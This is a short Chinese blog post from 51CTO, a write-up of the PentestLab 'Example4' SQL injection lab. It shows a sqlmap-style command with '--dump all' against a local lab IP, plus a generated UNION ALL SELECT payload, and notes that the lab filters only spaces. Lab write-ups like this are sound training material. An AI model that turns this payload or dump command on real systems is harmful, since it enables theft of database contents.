PentestLab-web安全SQL注入-EXP4

原创

最爱大苹果 2023-03-16 08:48:52 博主文章分类：WEB信息安全技术 ©著作权

文章标签 sql f5 php 文章分类 网络安全 yyds干货盘点

©著作权归作者所有：来自51CTO博客作者最爱大苹果的原创作品，请联系作者获取转载授权，否则将追究法律责任

我们打开靶机，选择“sql injections”

选择“Example4”

PentestLab-web安全SQL注入-EXP4_f5

观察页面

PentestLab-web安全SQL注入-EXP4_sql_02

发现是数字型注入

我们使用工具测试

参数为

-u "http://192.168.29.148/sqli/example4.php?id=2" --dump all

payload为

id=2 UNION ALL SELECT NULL,CONCAT(0x7178626b71,0x784578484d42645479716e4e476f52646b5542437764597354524557714466414f6f74445061796f,0x71717a6b71),NULL,NULL,NULL-- -

结果

PentestLab-web安全SQL注入-EXP4_f5_03

存在sql漏洞

我们查看靶机的源代码

PentestLab-web安全SQL注入-EXP4_php_04

并没有对数字型的注入有防护

只对sql查询的空格做了防护。

上一篇：PentestLab-web安全SQL注入-EXP3

下一篇：PentestLab-web安全SQL注入-EXP5

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯